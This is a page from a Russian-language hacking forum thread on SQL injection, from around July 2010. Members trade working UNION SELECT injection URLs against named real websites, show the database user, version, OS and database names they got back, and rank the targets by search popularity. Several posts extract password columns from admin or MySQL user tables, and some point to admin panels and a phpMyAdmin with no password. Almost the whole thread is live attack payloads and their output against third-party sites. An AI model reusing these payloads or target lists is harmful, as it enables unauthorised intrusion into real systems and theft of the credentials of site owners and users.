SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. emillord

    emillord Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    257
    Likes Received:
    444
    Reputations:
    255
    Вывод таблиц
    ТИЦ10(R2) PR3
    OS: unknown-linux-gnu
    User: highcou1_marttie@localhost
    Version: 5.1.47-community-log
    Database: highcou1_hca



    Вывод таблиц
    Пользователи
    ТИЦ10 PR4
    OS: pc-linux-gnu
    User: [email protected]
    Version: 5.1.39-log
    Database: test
     
    3 people like this.
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.feec.org

    http://www.feec.org/Informacio%20Gral/Refugis/refugi.php?idRef=-321+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,aes_decrypt(aes_encrypt(group_concat(user,char(58),password),1),1),46,47,48,49+from+mysql.user

    PR-5
     
    _________________________
    6 people like this.
  3. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    http://www.chel-volga.ru/avto.php?id=26&pid=-74+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),@@version_compile_os,version()),8,9,10,11,12 --
    USER-db_chel-volga@localhost
    VERSION()-5.0.45
    OS()-redhat-linux-gnu

    ТИЦ-10

    http://sdc-sochi.ru/avto.php?id=-24+union+select+1,2,3,concat_ws(0x3a,user(),@@version_compile_os,version()),5,6,7,8,910,11,12,13,14,15,16,17,18 --
    USER-[email protected]
    VERSION()-5.0.70-log
    OS()-pc-linux-gnu


    http://www.baw-fenix74.ru/avto.php?id=44&pid=-138+union+select+1,2,3,5,6,7,concat_ws(0x3a,user(),@@version_compile_os,version()),9,10,11,12,13 --
    USER-db_chel-volga@localhost
    VERSION()-5.0.45
    OS()-pc-linux-gnu


    http://newsprinter.ru/exc.php?e_id=-2+union+select+1,2,concat_ws%280x3a,user%28%29,@@version_compile_os,version%28%29%29,4,5,6,7,8,9,10,11,12%20 --
    USER-eot_eot@localhost
    VERSION()-5.0.90
    OS()-portbld-freebsd7.2


    http://www.korspb.ru/auto.php?id=-56+union+select+1,2,3,concat_ws%280x3a,user%28%29,@@version_compile_os,version%28%29%29,5,6%20 --
    USER-[email protected]
    VERSION()-5.0.77
    OS()-portbld-freebsd7.0


    http://www.zdeo.ru/parts/auto.php?cat=TR&id=-46+union+select+1,concat_ws%280x3a,user%28%29,@@version_compile_os,version%28%29%29,3,4,5,6,7,8,9,10%20--
    USER-zdeo_user@localhost
    VERSION()-5.0.67-0ubuntu6.1
    OS()-debian-linux-gnu

    ТИЦ-20
    PR-3


    http://www.futureevents.ru/event.php?id=-161+union+select+1,2,3,4,5,concat_ws%280x3a,user%28%29,@@version_compile_os,version%28%29%29,7%20--
    USER-[email protected]
    VERSION()-5.1.36-log
    OS()-portbld-freebsd7.2

    ТИЦ-20


    http://www.allbalances.ru/auto.php?id=-2+union+select+1,2,3,concat_ws%280x3a,user%28%29,@@version_compile_os,version%28%29%29,5,6,7,8,9,10,11,12,13,14%20 --
    USER-allbalances@localhost
    VERSION()-5.1.30
    OS()-portbld-freebsd7.1

    ТИЦ-210
    PR-2


    http://www.aeroprize-n.ru/dom.php?ID=-182+union+select+1,2,concat_ws%280x3a,user%28%29,@@version_compile_os,version%28%29%29 --
    USER-[email protected]
    VERSION()-5.0.85-community-nt-log
    OS()-Win64


    http://www.clas.ru/people.php?id=-12293+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,user%28%29,@@version_compile_os,version%28%29%29%20 --
    USER-u8122(sobaka)10.8.0.42
    VERSION()-5.0.90-log
    OS()-portbld-freebsd7.2

    ТИЦ-180

    http://www.mobil-land.ru/support.php?action=detail&id=-6472+union+select+1,2,3,4,5,concat_ws%280x3a,user%28%29,@@version_compile_os,version%28%29%29,7,8,9,10%20 --
    USER-[email protected]
    VERSION()-4.1.22-log
    OS()-portbld-freebsd6.2

    ТИЦ-30
    PR-2
     
    #12483 -PRIVAT-, 13 Jul 2010
    Last edited: 13 Jul 2010
    1 person likes this.
  4. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Национальный информационный сервис

    http://www.pulset.ru/all_citys.php?id_city=-116+and+1=2+union+select+1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4+--

    version : 5.1.45-log
    user : mediabro_user@localhost
    database : mediabro_dbname
    os : portbld-freebsd8.0
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    http://www.atkgames.com/admin/ - обязательно посмотрите исходник страници, админ там просто жжет :-D
     
    _________________________
    1 person likes this.
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    4.1.22-standard-log:webinside_portal:webinside_admins@localhost
    ТИЦ 10 PR 5

    -----
    5.0.84-log:solidp2_db:[email protected]
    PR 3

    //moder: имя таблиц писать не нужно если кому нужно будет то он сам вытащит.
     
    _________________________
    #12486 winstrool, 14 Jul 2010
    Last edited by a moderator: 14 Jul 2010
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.dezmarket.ru/foto.php?id=7+union+select+1,2,concat_Ws(0x3a,version(),database(),useR(),@@version_compile_os),4,5&open=1

    4.0.27-MAX-LOG:DEZMARKET_DEZM:D[email protected]:UNKNOWN-FREEBSD4.7
     
  8. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    721
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.sailnet.com/list_server/read_messages.php?id=-274090+UNION+SELECT+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5--
    Version: 5.0.77-log
    Database: listdata
    Username: [email protected]

    Google PR: 5
     
    1 person likes this.
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    patrick@localhost:halledit:4.1.11-Debian_4sarge7-log
    PR 6
     
    _________________________
    2 people like this.
  10. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Высокопиаристые скули

    http://realty.south.ru/dom.php?id=-217+union+select+concat_ws%280x3a,version%28%29,@@version_compile_os,user%28%29%29%20 --
    version(),@@version_compile_os,user()-5.0.67:portbld-freebsd7.1:[email protected]
    ТИЦ-110
    PR-4


    http://amkar.properm.ru/info.php?id=-12+union+select+1 --
    ТИЦ-750
    PR-5

    Посещаемость-Высокая

    http://www.analisi.ru/info.php?id=-10+union+select+1,concat_ws%280x3a,version%28%29,@@version_compile_os,user%28%29%29%20,3,4%20--
    version(),@@version_compile_os,user()-5.0.45:portbld-freebsd6.2:analisi@localhost
    ТИЦ-60
    PR-3


    http://novikovi.info/man.php?id=-22+union+select+concat_ws%280x3a,version%28%29,@@version_compile_os,user%28%29%29%20,2,3,4 --
    version(),@@version_compile_os,user()-5.0.90-log:portbld-freebsd7.2:[email protected]

    http://www.islamcivil.ru/cat.php?id=-1+union+select+1,2,3,4%20--
    ТИЦ-210
    PR-4


    http://www.nibulon.com/r/sport.php?id=-3401259+union+select+concat_ws%280x3a,version%28%29,@@version_compile_os,user%28%29%29%20%20--
    version(),@@version_compile_os,user()-5.0.67-0ubuntu6-log:debian-linux-gnu:nibulon_31@localhost
    ТИЦ-60
    PR-4


    http://www.horoskopa.com/sex.php?id=-10+union+select+1,2,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17,18+FROM%20Admins%20--
    PR-4


    http://www.promocionlaspalmas.com/prensa.php?fot_seccion=3&id=-1387+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29%29,4,5,6,7,8 --
    PR-5

    version(),@@version_compile_os,user()-4.0.16-log:promolp@localhost
     
    #12490 -PRIVAT-, 14 Jul 2010
    Last edited: 14 Jul 2010
    2 people like this.
  11. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Находка Медиа Групп

    http://www.nakhodkamedia.ru/news.php?news_id=-1275+and+1=2+union+select+1,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5--


    vesion : 5.0.91-community-log
    user : nakhodk0_user@localhost
    database : nakhodk0_db
    os : unknown-linux-gnu
     
    2 people like this.
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.webms.org/maket001/news.php?id_new=-5+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)


    5.0.87-percona-highperf-log:a6120_makets:[email protected]:unknown-linux-gnu
     
    #12492 Gorev, 14 Jul 2010
    Last edited by a moderator: 14 Jul 2010
    1 person likes this.
  13. emillord

    emillord Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    257
    Likes Received:
    444
    Reputations:
    255
    PR4
    pc-linux-gnu:dbo240820474@localhost:4.0.27-standard:db240820474


    PR3
    sun-solaris2.9:p1015354@localhost:4.1.22-standard-log:p1015354



    ТИЦ10 PR2
    unknown-linux-gnu:autod960_PavDB@localhost:5.0.81-community:autod960_PavlodarDB
    Таблицы
     
    1 person likes this.
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ms_access...

    http://www.musigi-dunya.az/new/read_magazine.asp?id=333+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+"table_name"

    PR-5
    тИЦ-90
    -------------
    http://www.ultra-t.ru/index.cfm?page=product&objectid=-67+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13+from+users&key=1&group=1

    PR-2
    тИЦ-20
    -------------
    http://www.geoing.org/artikullm.asp?id=-56+union+select+1,pass,3,4,5,6,7+from+user&gj=2&m=20
    (username-admin)
    http://www.geoing.org/admin
     
    _________________________
  15. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    ФИЛАРНОМИЯ

    http://www.filarmonia.e-burg.ru/photo/index.php?comm=-100+AND+1=2+union+select+concat_ws(char(58),@@version,user(),database(),@@version_compile_os)+--

    version : 5.1.37-1ubuntu5.1
    user : [email protected]
    database : PhCustom
    os : debian-linux-gnu
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    gaga@localhost:gaga:5.0.90-log

    PR 4
     
    _________________________
  17. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    http://www.bimeda.com.ar/faq.php?id=-1052+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20--
    PR-2


    http://www.astrum.com.mx/faq.php?id=-8+union+select+1,concat_ws%280x3a,version%28%29,user%28%29%29,3,4,5,6,7%20--
    PR-4

    version(),@@version_compile_os,user()-5.0.77:root@localhost4

    http://www.arctic-adventure.dk/tour.php?id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12 --
    PR-5

    ТИЦ-10


    http://camplajolla.org/tour.php?id=-161+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,@@version_compile_os%29,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1
    PR-2

    version(),@@version_compile_os,user()-5.1.39-log:[email protected]:pc-linux-gnu


    http://www.kentbankhead.com/web/tour.php?id=-23+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,user%28%29,@@version_compile_os%29,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0%20--
    PR-1


    http://www.southworth.com/page.php?id=-130+union+select+1 --
    PR-5

    ТИЦ-10
     
    #12497 -PRIVAT-, 15 Jul 2010
    Last edited: 15 Jul 2010
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.francorp.ae/reply.php?id=-1+union+select+1,2,group_concat(user_name,char(58),user_password),4,5+from+admin_login&threadid=1


    + PMA без пароля

    http://www.francorp.ae/myadmin/
     
    _________________________
    #12498 Konqi, 15 Jul 2010
    Last edited: 15 Jul 2010
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.mygetex.com/index.php?pid=-210+union+select+1,2,3,4,concat_ws(concat(char(32),char(58),char(32)),user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16
     
    _________________________
    2 people like this.
  20. aka dexter

    aka dexter Elder - Старейшина

    Joined:
    23 Jun 2006
    Messages:
    539
    Likes Received:
    801
    Reputations:
    74
    Code:
    http://www.niburu.nl/viewinstelling.php?id=-14+union+select+1,2,3,concat_ws(char(58),version(),user(),database(),@@version_compile_os),5,6,7,8,9--
    Version: 4.1.21-standard
    User: root@localhost
    Database: niburu_core
    Os: pc-linux-gnu

    PR - 5
    ТИЦ - 10
     
    2 people like this.
Thread Status:
Not open for further replies.